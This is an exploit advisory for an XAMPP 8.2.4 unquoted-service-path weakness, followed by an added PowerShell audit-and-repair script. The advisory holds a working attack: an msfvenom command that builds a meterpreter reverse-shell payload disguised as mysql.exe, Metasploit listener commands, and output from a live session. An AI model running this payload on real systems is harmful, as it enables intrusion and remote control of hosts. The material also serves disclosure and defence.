# Exploit Title: XAMPP 8.2.4 - Unquoted Path
# Date: 07/2023
# Exploit Author: Andrey Stoykov
# Version: 8.2.4
# Software Link: https://sourceforge.net/projects/xampp/files/XAMPP%20Windows/8.2.4/xampp-windows-x64-8.2.4-0-VS16-installer.exe
# Tested on: Windows Server 2022
# Blog: http://msecureltd.blogspot.com/

Steps to Exploit:
1. Search for unquoted paths
2. Generate meterpreter shell
3. Copy shell to XAMPP directory replacing "mysql.exe"
4. Exploit by double clicking on shell

C:\Users\astoykov>wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """
mysql    mysql    C:\xampp\mysql\bin\mysqld.exe --defaults-file=c:\xampp\mysql\bin\my.ini mysql    Auto

// Generate shell
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.16 lport=4444 -f exe -o mysql.exe

// Setup listener
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set lhost 192.168.1.13
msf6 exploit(multi/handler) > set lport 4443
msf6 exploit(multi/handler) > set payload meterpreter/reverse_tcp
msf6 exploit(multi/handler) > run
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 192.168.1.13:4443
[*] Sending stage (175686 bytes) to 192.168.1.11
[*] Meterpreter session 1 opened (192.168.1.13:4443 -> 192.168.1.11:49686) at 2023-07-08 03:59:40 -0700

meterpreter > getuid
Server username: WIN-5PT4K404NLO\astoykov
meterpreter > getpid
Current pid: 4724
meterpreter > shell
Process 5884 created.
Channel 1 created.
Microsoft Windows [Version 10.0.20348.1]
(c) Microsoft Corporation. All rights reserved.
[...]
C:\xampp\mysql\bin>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 80B5-B405

 Directory of C:\xampp\mysql\bin
[...]
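The wmic pipeline above is the manual form of step 1. The PowerShell script below is an added example written for this page, not the advisory author's code: it reads each service's ImagePath from the registry, reports services whose unquoted executable path contains a space (skipping anything under the Windows directory, like the findstr filter above), and offers a -WhatIf-capable function that wraps the executable path in quotes. The function names Get-UnquotedServicePath and Repair-UnquotedServicePath are assumed names; the script expects to run on Windows with read access to HKLM:\SYSTEM\CurrentControlSet\Services, and local administrator rights only when the repair is applied for real.

```powershell
# Added example (not part of the advisory above): audit a Windows host for services
# whose executable path is unquoted and contains a space, and optionally quote it.
# Assumes: runs on Windows; read access to HKLM:\SYSTEM\CurrentControlSet\Services;
# local admin rights only if Repair-UnquotedServicePath is run without -WhatIf.

function Get-UnquotedServicePath {
    [CmdletBinding()]
    param()

    $root = 'HKLM:\SYSTEM\CurrentControlSet\Services'
    $startModes = @{ 0 = 'Boot'; 1 = 'System'; 2 = 'Auto'; 3 = 'Manual'; 4 = 'Disabled' }

    Get-ChildItem -Path $root -ErrorAction SilentlyContinue | ForEach-Object {
        $props = Get-ItemProperty -Path $_.PSPath -ErrorAction SilentlyContinue
        $image = [string]$props.ImagePath
        if ([string]::IsNullOrWhiteSpace($image)) { return }

        $trimmed = $image.Trim()
        # Already quoted: the service control manager parses it unambiguously.
        if ($trimmed.StartsWith('"')) { return }

        # Executable portion = everything up to the first ".exe"; fall back to the
        # first whitespace-delimited token when the path does not end in .exe.
        $m = [regex]::Match($trimmed, '^(.*?\.exe)', 'IgnoreCase')
        $exeRaw = if ($m.Success) { $m.Groups[1].Value } else { $trimmed.Split(' ')[0] }
        $rest   = $trimmed.Substring($exeRaw.Length)   # arguments, e.g. --defaults-file=...

        # Expand %SystemRoot% and friends before testing for spaces.
        $exeExpanded = [Environment]::ExpandEnvironmentVariables($exeRaw)
        if ($exeExpanded -notmatch ' ') { return }

        # Mirror the advisory's findstr filter that skips anything under the Windows directory.
        if ($exeExpanded -like "$env:SystemRoot\*") { return }

        $start = $props.Start
        $startMode = if ($null -ne $start -and $startModes.ContainsKey([int]$start)) {
            $startModes[[int]$start]
        } else { 'Unknown' }

        [PSCustomObject]@{
            Name      = $_.PSChildName
            StartMode = $startMode
            ImagePath = $image
            ExePath   = $exeExpanded
            # Quote only the executable, keep the arguments and any %VAR% references untouched.
            QuotedFix = '"{0}"{1}' -f $exeRaw, $rest
        }
    }
}

function Repair-UnquotedServicePath {
    [CmdletBinding(SupportsShouldProcess = $true)]
    param(
        [Parameter(Mandatory = $true, ValueFromPipeline = $true)]
        [PSCustomObject]$Finding
    )
    process {
        $key = "HKLM:\SYSTEM\CurrentControlSet\Services\$($Finding.Name)"
        if ($PSCmdlet.ShouldProcess($Finding.Name, "Set ImagePath to $($Finding.QuotedFix)")) {
            # ImagePath is REG_EXPAND_SZ; keep that type so %SystemRoot%-style values still expand.
            Set-ItemProperty -Path $key -Name ImagePath -Value $Finding.QuotedFix -Type ExpandString
        }
    }
}

# Report every finding, then preview the fix without changing anything.
Get-UnquotedServicePath | Format-Table Name, StartMode, ExePath -AutoSize
Get-UnquotedServicePath | Repair-UnquotedServicePath -WhatIf
```

Unlike the wmic one-liner, which only lists auto-start services, the report includes the start mode as a column so manual-start services are not missed. An unquoted path is only a privilege-escalation risk when a non-administrator can create files in one of the intermediate directories, so pair this output with a Get-Acl review of those directories and of the service's own install directory; quoting the ImagePath removes the path ambiguity, and the new value takes effect the next time the service starts.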